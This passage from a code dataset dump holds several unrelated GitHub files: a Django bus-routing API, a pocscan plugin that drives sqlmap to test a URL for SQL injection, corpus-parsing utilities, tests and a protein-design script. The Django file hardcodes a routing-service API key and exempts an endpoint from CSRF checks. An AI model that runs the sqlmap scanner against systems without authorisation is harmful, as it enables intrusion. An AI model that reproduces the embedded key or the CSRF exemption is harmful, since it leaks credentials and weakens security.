print(bus_stops)\n\n else:\n mid_stop = None\n routes = [start_route]\n\n start_stops = start_route.bus_stops.filter(\n stopinfo__weight=StopWeight.ROUTABLE\n ).all()\n stop = Stop.objects.get(lat=start_stop[0], lon=start_stop[1])\n s_stop_info = StopInfo.objects.get(route=start_route, stop=stop)\n if start_route.forward:\n start_bus_stops = \\\n start_stops.filter(stopinfo__order__gte=s_stop_info.order).distinct()\n else:\n start_bus_stops = \\\n reversed(\n start_stops.filter(stopinfo__order__lte=s_stop_info.order).distinct()\n )\n \n count = StopInfo.objects.filter(route=start_route).count()\n cost = calculate_cost(start_route, s_stop_info, count)\n\n print(locations)\n\n # journey = Journey\n start_stop_obj = Stop.objects.filter(lat=start_stop[0], lon=start_stop[1]).first()\n final_stop_obj = Stop.objects.filter(lat=final_stop[0], lon=final_stop[1]).first()\n\n # bus_stops.insert(0, start_stop_obj)\n # bus_stops.append(final_stop_obj)\n print(\"Routing Stops: \", bus_stops)\n\n journey = Journey.objects.create(\n from_location=from_loc,\n to_location=to_loc,\n start_stop=start_stop_obj,\n final_stop=final_stop_obj,\n mid_stop=mid_stop,\n start_cost=start_cost,\n final_cost=final_cost,\n cost=cost,\n )\n for s in notify_stops:\n journey.notify_stops.add(s)\n for r in routes:\n journey.routes.add(r)\n for s in bus_stops:\n journey.routing_stops.add(s)\n journey.save()\n serializer = JourneySerializer(Journey.objects.filter(id=journey.id).first())\n return JsonResponse(serializer.data, safe=True)\n\n@csrf_exempt\ndef feedback(request):\n received_feedback = request.POST['feedback']\n user = 
request.POST['user']\n    feedback = Feedback(user=user, feedback=received_feedback)\n    feedback.save()\n    return HttpResponse(\"Feedback added successfully!\")\n\ndef calculate_cost(route:Route, stopInfo:StopInfo, count:int):\n    cost = route.fee\n    if route.fixed_fee:\n        return cost\n\n    count = StopInfo.objects.filter(route=route).count()\n    if (cost >= 500) and route.forward:\n        if (stopInfo.order / count) <= 0.75:\n            cost = 0.6666 * cost\n            cost = round(cost / 100)\n            cost = cost * 100\n    elif (cost >= 500) and (not route.forward):\n        if (stopInfo.order / count) <= 1.333:\n            cost = 0.666 * cost\n            cost = round(cost / 100)\n            cost = cost * 100\n\n    return cost\n\n    \n\ndef get_latest_journey(request):\n    journey = Journey.objects.all().last()\n    return JsonResponse(json.dumps(journey.directions), safe=False)\n\nclass GetRoute(generics.ListAPIView):\n    serializer_class = JourneySerializer\n\n    def get_queryset(self):\n        if self.request.method != \"GET\":\n            return HttpResponseNotAllowed(\"Methods other than GET not allowed\")\n\n        start_stop = (self.request.GET['start_lat'],self.request.GET['start_lon'])\n        final_stop = (self.request.GET['final_lat'],self.request.GET['final_lon'])\n        \n        if (start_stop == None) or (final_stop == None):\n            return HttpResponseBadRequest(\"Start and/or Final stops not set\")\n\n        overpassApi = overpy.Overpass()\n\n        # fetch the real lat and lon\n        start_stop, final_stop = getStartAndFinalStops(start_stop, overpassApi, final_stop)\n\n        # find the origin route\n        start_route = Route.objects.filter(bus_stops__lat=start_stop[0])\n        start_route = start_route.filter(bus_stops__lon=start_stop[1]).first()\n\n        # find the destination route\n        final_route = Route.objects.filter(bus_stops__lat=final_stop[0])\n        final_route = final_route.filter(bus_stops__lon=final_stop[1]).first()\n        \n        if (start_route == None) or (final_route == None):\n            raise Http404(\"Start/Final Stop not in any route\")\n\n        # the stops are in a route, calculate the waypoints\n        common_stops = []\n        mid_stop = None\n\n        common_stops = start_route.bus_stops.filter(pk__in=final_route.bus_stops.all())\n        mid_stop = common_stops[len(common_stops) - 1]\n        multiple_routes = True if (common_stops.count() != start_route.bus_stops.count()) else False\n\n        locations = []\n        bus_stops = []\n\n        routes = [start_route, final_route]\n        cost = 0\n\n        notify_stops = []\n        notify_stops.append(start_route.bus_stops.all()[len(start_route.bus_stops.all()) - 2])\n        if multiple_routes:\n            cost = 1000\n            for s in start_route.bus_stops.all():\n                locations.append([s.lon, s.lat])\n                bus_stops.append(s)\n                print(\"Adding: \", s.name)\n                if (s.lat == mid_stop.lat) and (s.lon == mid_stop.lon):\n                    print(\"Broke at: \", s)\n                    break\n            \n            # print(final_route.bus_stops.all())\n            \n            # final_route.bus_stops.reverse()\n            final_stops = final_route.bus_stops.all()\n            size = final_stops.count()\n            print(size)\n            for i in range(size - 1,0,-1):\n                print(\"Adding: \", final_stops[i].name)\n                # the mid stop has already been added\n                if (final_stops[i].lat == mid_stop.lat) and (final_stops[i].lon == mid_stop.lon):\n                    continue\n\n                bus_stops.append(final_stops[i])\n                locations.append([final_stops[i].lon, final_stops[i].lat])\n                if (final_stops[i].lat == float(final_stop[0])) and (final_stops[i].lon == float(final_stop[1])):\n                    notify_stops.append(final_stops[i+1])\n                    print(\"Broke at: \", s)\n                    break\n        else:\n            cost = 500\n            routes = [final_route]\n            for r in start_route.bus_stops.all():\n                locations.append([r.lon, r.lat])\n                if (r.lat == float(final_stop[0])) and (r.lon == float(final_stop[1])):\n                    print(\"Broke at: \", r)\n                    break\n\n        
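A hedged mirror of the forward-route branch of calculate_cost above, with worked numbers; the fare semantics are inferred from the code, not from any documentation:

```python
def discounted_fare(fee, order, count, forward=True, fixed=False):
    # Fixed-fee routes and cheap fares (< 500) are never discounted.
    if fixed or fee < 500:
        return fee
    if forward and (order / count) <= 0.75:
        # e.g. 0.6666 * 500 = 333.3 -> round(333.3 / 100) * 100 = 300
        fee = round(0.6666 * fee / 100) * 100
    return fee

print(discounted_fare(500, 10, 20))  # boarding at 50% of the route -> 300
print(discounted_fare(500, 18, 20))  # past 75% of the route -> 500
```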
print(locations)\n\n routing_client = ORS(\n api_key=\"5b3ce3597851110001cf62483a24528b22554895b20e36724d991206\",\n retry_over_query_limit=False,\n )\n\n \"\"\" calculated_route = routing_client.directions(\n locations=locations,\n profile='driving-car',\n instructions=True,\n continue_straight=True\n ) \"\"\"\n\n # journey = Journey\n start_stop_obj = Stop.objects.filter(lat=start_stop[0], lon=start_stop[1]).first()\n final_stop_obj = Stop.objects.filter(lat=final_stop[0], lon=final_stop[1]).first()\n\n journey = Journey(\n start_stop=start_stop_obj,\n final_stop=final_stop_obj,\n mid_stop=mid_stop,\n cost=cost\n )\n journey.save()\n\ndef getStartAndFinalStops(start_stop, overpassApi, final_stop):\n start_stop = (\n Decimal(start_stop[0]).normalize(), \n Decimal(start_stop[1]).normalize())\n final_stop = (\n Decimal(final_stop[0]).normalize(), \n Decimal(final_stop[1]).normalize())\n\n selectedStartStop = tuple()\n selectedFinalStop = tuple()\n\n earthCircumference = 40_030_173.59204115\n\n startDistance = earthCircumference\n finalDistance = earthCircumference\n\n stops = StopInfo.objects.all().distinct()\n stopLatAndLongs = []\n for s in stops:\n currentTuple = (float(s.stop.lat), float(s.stop.lon))\n calcStartDistance = haversine(\n start_stop, currentTuple, unit=Unit.METERS)\n calcFinalDistance = haversine(\n final_stop, currentTuple, unit=Unit.METERS)\n\n if calcStartDistance < startDistance:\n startDistance = calcStartDistance\n selectedStartStop = (s.stop.lat, s.stop.lon)\n\n if calcFinalDistance < finalDistance:\n finalDistance = calcFinalDistance\n selectedFinalStop = (s.stop.lat, s.stop.lon)\n\n\n return selectedStartStop, selectedFinalStop\n\ndef intersection(routeA, routeB):\n tupA = map(tuple, routeA)\n tupB = map(tuple, routeB)\n return list(map(list, set(tupA).intersection(tupB)))","repo_name":"mepowerleo10/BusPoint-Server","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72745666650","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom chtscan.chtscan import Scanner\n\n\nclass sqli(Scanner):\n def get_setting(self):\n self.scanner_exe = 'sqlmap'\n return dict(\n scanner_exe='/usr/share/sqlmap/sqlmap.py',\n out_dir='/tmp/',\n )\n\n def get_cmd(self):\n cmd = [\n self.get_setting()['scanner_exe'],\n \"--batch\",\n \"-u\", self.req.url,\n \"-v\", \"0\",\n \"--level=2\",\n \"--disable-coloring\",\n \"--text-only\",\n \"--purge-output\",\n \"--user-agent\", self.req.ua,\n \"-o\",\n \"--crawl=0\",\n \"--output-dir\", self.get_setting()['out_dir'],\n ]\n\n if self.req.referer:\n cmd.extend((\"--referer\", self.req.referer))\n\n if len(self.req.cookie) > 0:\n cmd.extend([\"--cookie\", \"%s\" % self.req.cookie])\n\n if self.req.method == \"POST\":\n cmd.extend((\"--method\", \"POST\"))\n if self.req.data:\n cmd.extend((\"--data\", self.req.data))\n\n return cmd\n\n def get_detail(self):\n self.vuln_type = \"sqli\"\n report = re.findall(r'\\n Payload:(.*?)\\n', self.result[0])\n if len(report) == 0: return\n\n if len(self.req.cookie) > 0:\n report.append(\"Cookie: \" + self.req.cookie)\n self.detail = report\n","repo_name":"erevus-cn/pocscan","sub_path":"chtscan/scanner/sqlc.py","file_name":"sqlc.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":517,"dataset":"github-code","pt":"32"} +{"seq_id":"16540791945","text":"import os\nimport argparse\nimport xml.etree.ElementTree as 
ET\n\n\nMAKE_CORPUS_PATH = lambda f: os.path.join(os.path.dirname(__file__), \"./corpus/\" + f)\n\n\ndef extract(file_path):\n if not os.path.isfile(file_path):\n raise Exception(\"Abstract file does not found.\")\n root = ET.parse(file_path)\n root.findall(\".\")\n\n file_path = MAKE_CORPUS_PATH(\"abstracts.txt\")\n stream = open(file_path, mode=\"w\", encoding=\"utf-8\")\n\n for doc in root.findall(\"./doc\"):\n abs = doc.find(\"./abstract\").text\n if not abs:\n continue\n elif abs.startswith((\"|\", \"thumb\", \"{\", \"・\", \")\", \"(\", \"link\")):\n continue\n title = doc.find(\"./title\").text.replace(\"Wikipedia: \", \"\")\n\n if abs and title:\n stream.write(title + \"\\n\")\n stream.write(abs + \"\\n\")\n \n stream.close()\n\n\ndef concat(dir, prefix):\n if not os.path.isdir(dir):\n raise Exception(\"directory is not found\")\n \n paths = []\n def fetch(_dir):\n files = os.listdir(_dir)\n for f in files:\n p = os.path.join(_dir, f)\n if os.path.isfile(p) and f.startswith(prefix):\n paths.append(p)\n if os.path.isdir(p):\n fetch(p)\n \n fetch(dir)\n file_path = MAKE_CORPUS_PATH(prefix + \"_all.txt\")\n with open(file_path, mode=\"w\", encoding=\"utf-8\") as o:\n for p in paths:\n print(\"concat {}.\".format(p))\n with open(p, mode=\"r\", encoding=\"utf-8\") as f:\n for line in f:\n o.write(line)\n\n\ndef wakati(file_path):\n from janome.tokenizer import Tokenizer\n path, ext = os.path.splitext(file_path)\n wakati_path = path + \"_wakati\" + ext\n\n tokenizer = Tokenizer()\n\n def wsplit(text):\n ws = []\n tokens = tokenizer.tokenize(text.strip())\n for t in tokens:\n w = t.surface.strip()\n if w:\n ws.append(w)\n return ws\n\n with open(file_path, mode=\"r\", encoding=\"utf-8\") as f:\n with open(wakati_path, mode=\"w\", encoding=\"utf-8\") as w:\n for line in f:\n words = wsplit(line)\n w.write(\" \".join(words) + \"\\n\")\n\n\ndef tokenize(file_path, vocab_size):\n import MeCab\n path, ext = os.path.splitext(file_path)\n vocab_path = path + \".vocab\"\n tokenized_path = path + \"_tokenized\" + ext\n UNKNOWN = 0\n\n tagger = MeCab.Tagger(\"-Owakati\")\n tagger.parse(\"\")\n\n def wsplit(text):\n ws = []\n node = tagger.parseToNode(text.strip())\n while node:\n w = node.surface.strip()\n if w:\n ws.append(w)\n node = node.next\n \n return ws\n\n # make vocab file\n print(\"making vocabulary dictionary...\")\n vocab = {}\n with open(file_path, mode=\"r\", encoding=\"utf-8\") as f:\n for line in f:\n words = wsplit(line)\n for w in words:\n if w in vocab:\n vocab[w] += 1\n else:\n vocab[w] = 1\n\n dictionary = [UNKNOWN] + sorted(vocab, key=vocab.get, reverse=True)\n dictionary = dictionary[:vocab_size]\n with open(vocab_path, mode=\"w\", encoding=\"utf-8\") as v:\n v.write(\"\\n\".join([str(_v) for _v in dictionary]))\n\n # make tokenized file\n print(\"tokenize by vocabulary dictionary...\") \n with open(file_path, mode=\"r\", encoding=\"utf-8\") as f:\n with open(tokenized_path, mode=\"w\", encoding=\"utf-8\") as t:\n for line in f:\n words = wsplit(line)\n tokens = [dictionary.index(w) if w in dictionary else UNKNOWN for w in words]\n t.write(\" \".join([str(_t) for _t in tokens]) + \"\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Utility Parser\")\n parser.add_argument(\"path\", type=str, help=\"target path\")\n parser.add_argument(\"--extract\", action=\"store_const\", const=True, default=False, help=\"extract abstract xml\")\n parser.add_argument(\"--wakati\", action=\"store_const\", const=True, default=False, help=\"separate japanese 
text (You need janome)\")\n parser.add_argument(\"--concat\", type=str, help=\"concatenate files that matches the pattern in target directory\")\n parser.add_argument(\"--tokenize\", type=int, default=-1, help=\"make vocab file and tokenize target file. vocab size is directed size. (You need MeCab)\")\n\n args = parser.parse_args()\n path = args.path\n if path.startswith(\"/\"):\n path = os.path.join(os.path.dirname(__file__), path)\n\n if args.extract:\n extract(path)\n elif args.wakati:\n wakati(path)\n elif args.concat:\n concat(path, args.concat)\n elif args.tokenize > 0:\n tokenize(path, args.tokenize)\n","repo_name":"icoxfog417/fastTextJapaneseTutorial","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"32"} +{"seq_id":"35817902145","text":"from collections import OrderedDict\n\nfrom plenum.common.messages.fields import IterableField, NonNegativeNumberField\nfrom plenum.common.messages.node_messages import OldViewPrePrepareRequest\n\nEXPECTED_FIELDS = OrderedDict([\n (\"instId\", NonNegativeNumberField),\n (\"batch_ids\", IterableField),\n])\n\n\ndef test_has_expected_type():\n assert OldViewPrePrepareRequest.typename == \"OLD_VIEW_PREPREPARE_REQ\"\n\n\ndef test_has_expected_fields():\n actual_field_names = OrderedDict(OldViewPrePrepareRequest.schema).keys()\n assert list(actual_field_names) == list(EXPECTED_FIELDS.keys())\n\n\ndef test_has_expected_validators():\n schema = dict(OldViewPrePrepareRequest.schema)\n for field, validator in EXPECTED_FIELDS.items():\n assert isinstance(schema[field], validator)\n","repo_name":"hyperledger/indy-plenum","sub_path":"plenum/test/input_validation/message_validation/test_old_view_preprepare_req_message.py","file_name":"test_old_view_preprepare_req_message.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"32"} +{"seq_id":"21242642948","text":"from flask import request\n\nfrom fate_flow.utils import job_utils\nfrom fate_flow.utils.api_utils import get_json_result, error_response\nfrom fate_arch.common import file_utils\n\n\n@manager.route('/job_config/get', methods=['POST'])\ndef get_config():\n kwargs = {}\n job_configuration = None\n\n for i in ('job_id', 'role', 'party_id'):\n if request.json.get(i) is None:\n return error_response(400, f\"'{i}' is required.\")\n kwargs[i] = str(request.json[i])\n\n for i in ('component_name', 'task_id', 'task_version'):\n if request.json.get(i) is None:\n break\n kwargs[i] = str(request.json[i])\n else:\n try:\n job_configuration = job_utils.get_task_using_job_conf(**kwargs)\n except Exception:\n pass\n\n if job_configuration is None:\n job_configuration = job_utils.get_job_configuration(kwargs['job_id'], kwargs['role'], kwargs['party_id'])\n\n if job_configuration is None:\n return error_response(404, 'Job not found.')\n\n return get_json_result(data=job_configuration.to_dict())\n\n\n@manager.route('/json_conf/load', methods=['POST'])\ndef load_json_conf():\n job_conf = file_utils.load_json_conf(request.json.get(\"config_path\"))\n return get_json_result(data=job_conf)\n","repo_name":"FederatedAI/FATE-Flow","sub_path":"python/fate_flow/scheduling_apps/operation_app.py","file_name":"operation_app.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"32"} +{"seq_id":"16678517170","text":"import pathlib\nfrom 
setuptools import find_packages, setup\n\n# The directory containing this file\nHERE = pathlib.Path(__file__).parent\n\n# The text of the README file\nREADME = (HERE / \"README.md\").read_text()\n\n# This call to setup() does all the work\nsetup(\n name=\"toggl-report\",\n version=\"1.0.7\",\n description=\"Generate PDF report from toggl\",\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/alexzelenuyk/toggl-report-to-gulp\",\n author=\"Oleksii Zeleniuk\",\n license=\"MIT\",\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n ],\n packages=find_packages(exclude=(\"test\",)),\n include_package_data=True,\n install_requires=[\"fpdf\", \"iso8601\", \"requests\"],\n entry_points={\n \"console_scripts\": [\n \"toggl_report=cli:main\",\n ]\n },\n)\n","repo_name":"alexzelenuyk/toggl-report-to-gulp","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30149757317","text":"\"\"\"\r\n\n\nCreate a function that gets every pair of numbers from an array that **sums up\nto eight** and returns it as an array of pairs (sorted ascendingly). See the\nfollowing examples for more details.\n\n### Examples\n\n sums_up([1, 2, 3, 4, 5]) ➞ [[3, 5]]\n \n sums_up([1, 2, 3, 7, 9]) ➞ [[1, 7]]\n \n sums_up([10, 9, 7, 2, 8]) ➞ []\n \n sums_up([1, 6, 5, 4, 8, 2, 3, 7]) ➞ [[2, 6], [3, 5], [1, 7]]\n // [6, 2] first to complete the cycle (to sum up to 8)\n // [5, 3] follows\n // [1, 7] lastly\n // the pair that completes the cycle is always found on the left\n // [2, 6], [3, 5], [1, 7] sorted according to cycle completeness, then pair-wise.\n\n### Notes\n\n * Remember the idea of _\"completes the cycle first\"_ when getting the sort order of the pairs.\n * Only unique numbers are present in the array.\n * Return an **empty array** if nothing sums up to eight.\n\n\"\"\"\r\n\ndef sums_up(lst):\n d={}\n ml=[]\n l=[]\n for p in range(len(lst)):\n if p ==len(lst)-1:\n if lst[p]+z[e]==8:\n l.append(lst[p])\n l.append(z[e])\n l.append(len(lst)-1)\n ml.append(l)\n l=[]\n break\n z=lst[p+1:]\n for e in range(len(z)):\n if lst[p]+z[e]==8:\n l.append(lst[p])\n l.append(z[e])\n l.append(e+p)\n ml.append(l)\n l=[]\n ml.sort(key=lambda x:x[2])\n print(ml)\n for r in range(len(ml)):\n ml[r]=ml[r][0:2]\n ml[r].sort()\n d[\"pairs\"]=ml\n return d\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"uWW8cZymSkrREdDpQ_18.py","file_name":"uWW8cZymSkrREdDpQ_18.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70298193371","text":"'''\n--------------------\nModule: b64_b32_2\n--------------------\nDescription: \n - b64_b32 is a module to split 64bits chunk into\n two 32bits chunks.\n--------------------\nInput: \n - 8 bytes - stream.\n--------------------\nOutput:\n - 4 bytes - stream.\n--------------------\ntiming:\n - This module guarantee that no extra overhead will be \n introduced.\n--------------------\nNotes :\n - the module assume that it reads data from FIFO, which mean that\n whenever the valid signal is 1, it will always be one till latching it.\n - the module assume that it write data to AXI stream interface, data only\n transfered when both valid_out=1 and i_busy=0.\n - this module is optional and can be used with 
axi_hp[reader/writer]\n and it is not related to LJ92 core.\n--------------------\n'''\n\nfrom nmigen import *\nfrom nmigen.cli import main\nfrom nmigen.back import *\nimport clk_domains\n\nclass B64B32_2(Elaboratable):\n\n def __init__(self):\n\n #data in\n self.data_in = Signal(64)\n\n #data out\n self.data_out = Signal(24)\n\n #signals\n self.valid_in = Signal(1)\n self.valid_out = Signal(1)\n\n self.o_busy = Signal(1, reset=1) #I'm busy\n self.i_busy = Signal(1) #next busy\n\n self.ios = \\\n [self.valid_in, self.valid_out, self.o_busy, self.i_busy] + \\\n [self.data_out, self.data_in]\n\n def elaborate(self, platform):\n\n m = Module()\n\n clk_domains.load_clk(m)\n\n # register to hold data\n reg = Signal(64)\n reg_valid = Signal(1)\n reg_tobe_invalid = Signal(1)\n half_latched = Signal(1)\n\n # wire o_busy\n wire_obusy = Signal(1)\n m.d.full += self.o_busy.eq(wire_obusy)\n\n m.d.comb += [\n reg_tobe_invalid.eq(0),\n # ordinary this module is busy and will only go to un-busy\n # if data is present in fifo and the register is empty.\n wire_obusy.eq(1),\n ]\n\n # valid input data, and there is no data in register or this data\n # will not be needed next cycle, then register the data.\n with m.If((self.valid_in==1) & ((reg_valid==0) | (reg_tobe_invalid==1))):\n m.d.full += [\n reg.eq(self.data_in),\n reg_valid.eq(1),\n ]\n m.d.comb += [\n wire_obusy.eq(0),\n ]\n\n # if there is valid data in the register but there is no valid data in the\n # output, out the first half and set valid_out to 1.\n with m.If((reg_valid==1) & (self.valid_out==0) & (half_latched==0)):\n m.d.full += [\n self.data_out.eq(reg[40:64]),\n self.valid_out.eq(1),\n half_latched.eq(1),\n ]\n\n # if and output operation occurred [(self.i_busy==0) and (self.valid_out==1)]\n # and there is valid data in register, then output the correct half.\n with m.If((reg_valid==1) & (self.i_busy==0) & (self.valid_out==1)):\n with m.If(half_latched==1):\n m.d.full += [\n self.data_out.eq(reg[16:40]),\n self.valid_out.eq(1),\n half_latched.eq(0),\n ]\n # in the last half, if there is no valid data ready the the \n # reg_valid will turn to be 0.\n m.d.comb += [\n reg_tobe_invalid.eq(1),\n ]\n with m.If(self.valid_in==0):\n m.d.full += [\n reg_valid.eq(0),\n ]\n with m.Else():\n m.d.full += [\n self.data_out.eq(reg[40:64]),\n self.valid_out.eq(1),\n half_latched.eq(1),\n ]\n\n # if output operation occurred, and the reg_valid remains 0, then\n # valid_out will turn to be 0.\n with m.If((reg_valid==0) & (self.i_busy==0) & (self.valid_out==1)):\n m.d.full += [\n self.valid_out.eq(0),\n ]\n\n return m\n\nif __name__ == \"__main__\":\n d = B64B32_2()\n main(d, ports=d.ios)","repo_name":"FaresMehanna/JPEG-1992-lossless-encoder-core","sub_path":"migen_src/b64_b32_2.py","file_name":"b64_b32_2.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"42182525527","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport math\nfrom time import sleep\n\"\"\"\nRappel : indice réfraction air : 1 (ou presque)\nindice réfraction verre : 1,5 (en moyenne)\nindice réfraction eau : 1,33333 (4/3)\n\"\"\"\ndef foncTransmis():\n n1=float(input(\"Entrez l'incide de réfraction du premier milieu : \"))\n n2=float(input(\"Entrez l'incide de réfraction du second milieu : \"))\n angl1=float(input(\"Entrez l'angle d'incidence en degrés \"))\n angle1=math.pi*angl1/180\n print(\"Vous avez entré\",angl1,\"° soit\",angle1,\"rad.\")\n if n2anglim:\n print(\"Ce calcul est 
def foncIncident():\n    n1=float(input(\"Entrez l'indice de réfraction du premier milieu : \"))\n    n2=float(input(\"Entrez l'indice de réfraction du second milieu : \"))\n    angl2=float(input(\"Entrez l'angle de réfraction en degrés \"))\n    angle2=math.pi*angl2/180\n    if n1<n2:\n        anglim=abs(math.asin(n1/n2))\n    else:\n        anglim=math.pi/2\n    if angle2>anglim:\n        print(\"Ce calcul est impossible, il y aura réflexion complète.\")\n    else:\n        angl1=abs(math.asin(math.sin(angle2)*n2/n1))*180/math.pi\n        print(\"L'angle\",angl2,\"° transmis est issu d'un angle\",angl1,\"° incident.\")\n    return(True)\n\ndef foncIndiceDeux():\n    n1=float(input(\"Entrez l'indice de réfraction du milieu incident. \"))\n    angli=float(input(\"Entrez l'angle d'incidence en degrés : \"))\n    anglt=float(input(\"Entrez l'angle de transmission en degrés : \"))\n    if anglt%180==0:\n        print(\"Calcul impossible, division par zéro\")\n    else:\n        n2=n1*math.sin(angli*math.pi/180)/math.sin(anglt*math.pi/180)\n        print(\"L'indice de réfraction du 2eme milieu vaut\",n2)\n    return(True)\n\ndef foncIndiceUn():\n    n2=float(input(\"Entrez l'indice de réfraction du milieu incident. \"))\n    angli=float(input(\"Entrez l'angle d'incidence en degrés : \"))\n    anglt=float(input(\"Entrez l'angle de transmission en degrés : \"))\n    if angli%180==0:\n        print(\"Calcul impossible, division par zéro\")\n    else:\n        n1=n2*math.sin(anglt*math.pi/180)/math.sin(angli*math.pi/180)\n        print(\"L'indice de réfraction du 1er milieu vaut\",n1)\n    return(True)\n\n\nboucler=True\n\nwhile boucler:\n    print(\"\")\n    print(\"Menu principal\")\n    print(\"==============\")\n    print(\"\")\n    print(\"Veuillez saisir un choix et valider.\")\n    print(\"[1] : Calcul angle transmis\")\n    print(\"[2] : Calcul angle incident\")\n    print(\"[3] : Calcul indice réfraction milieu 2\")\n    print(\"[4] : Calcul indice réfraction milieu 1\")\n    print(\"[q] : Quitter\")\n    choix=input(\"> \")\n    if choix=='1':\n        foncTransmis()\n    elif choix=='2':\n        foncIncident()\n    elif choix=='3':\n        foncIndiceDeux()\n    elif choix=='4':\n        foncIndiceUn()\n    elif choix=='42':\n        print(\"Vous avez la réponse ...\")\n        boucler=True\n    elif choix=='q':\n        print(\"Vous avez choisi de nous quitter, au revoir.\")\n        boucler=False\n    else:\n        print(\"Saisie erronée, avez-vous vérifié le blocage des majuscules ?\")\nprint(\"(c) F.S.G. Juin 2022\")
","repo_name":"fgonz666/FormationSmartphones","sub_path":"c5-1.pc.ac lois snell descartes/snell-descartes.py","file_name":"snell-descartes.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"10514129400","text":"from sys import argv\nfrom time import sleep, time\nfrom multiprocessing import Pool\nimport os, json, shutil, itertools\nfrom glob import glob\nfrom postDesignClass_v2 import postDesign\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n# load parameter file\nwith open(argv[1]) as jsonfile:\n\txParams = json.load(jsonfile)\n\nstage = argv[2] # stage options are PFC, RM, ordered or test\nstage = stage.lower()\nstart = time()\n\n# input a file_increment, or it will grab the folder with the largest increment to start with\nif len(argv) > 4:\n\tfile_incre = \"{:02d}\".format(int(argv[4]))\nelse:\n\tfor i in itertools.count(start=1):\n\t\tif not os.path.exists('../'+xParams['PDBID']+'/CLUSTERX_'+\"{:02d}\".format(i)+'/'):\n\t\t\tfile_incre = \"{:02d}\".format(i-1)\n\t\t\tbreak\n\nif stage == 'ordered':\n\tPDB = glob('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/hpDesigned'+'/*.pdb')\nelse:\n\t# Reading data frame\n\tdf = pd.read_csv(argv[3], delimiter='\\t')\n\n# making necessary folders\ntry:\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/logs')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/Clv')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/PFChecked')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/Trans')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/Min_des')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/Rlx_test')\n\tprint('\\n\\n\\nFolders generated\\n\\n\\n')\nexcept:\n\tprint('\\n\\n\\nFolders exist\\n\\n\\n')\n\n\n#-------------------------------------------Below are the functions in this script---------------------------------\ndef get_shorter_name(somepdb,des_code,cut):\n\t'''\n\tNice function to change nasty pdb filenames into manageable codes that are still unique and identifying, based on current naming conventions (7-2-2021)\n\tInputs: pdbname\t\tstr\t\t\tAssumed to be formatted as usual in the scoring process\n\t\t\tdes_code\tstr\t\t\tThe design number to be included in the short_name\n\t\t\tcut\t\t\tbool\t\tWhether this scorefile was taken from cleaved structures or not\n\t'''\n\tif cut:\n\t\treturn 'd'+des_code+'_'+somepdb[-19:-15].lstrip('0')+somepdb[-13:-10].lstrip('0')+somepdb[-10:-8].lstrip('0')\n\treturn 'd'+des_code+'_'+somepdb[-19:-15].lstrip('0')+somepdb[-13:-10].lstrip('0')+somepdb[-10:-8].lstrip('0')\n\ndef print_top(df,sort_by_column,num_print=10,ascending=True):\n\ttemp_df = df\n\tif ascending:\n\t\ttemp_df = temp_df.sort_values(sort_by_column,ignore_index=True, ascending=True)\n\telse:\n\t\ttemp_df = temp_df.sort_values(sort_by_column,ignore_index=True, ascending=False)\n\n\treturn temp_df[sort_by_column].iloc[:num_print]\n\n
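# For a fixed product value c, the set of points with term1*term2 = c is the\n# hyperbola y = c/x, so each dashed cutoff line drawn below marks the boundary\n# of the best fraction of designs given in percent_list.\n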
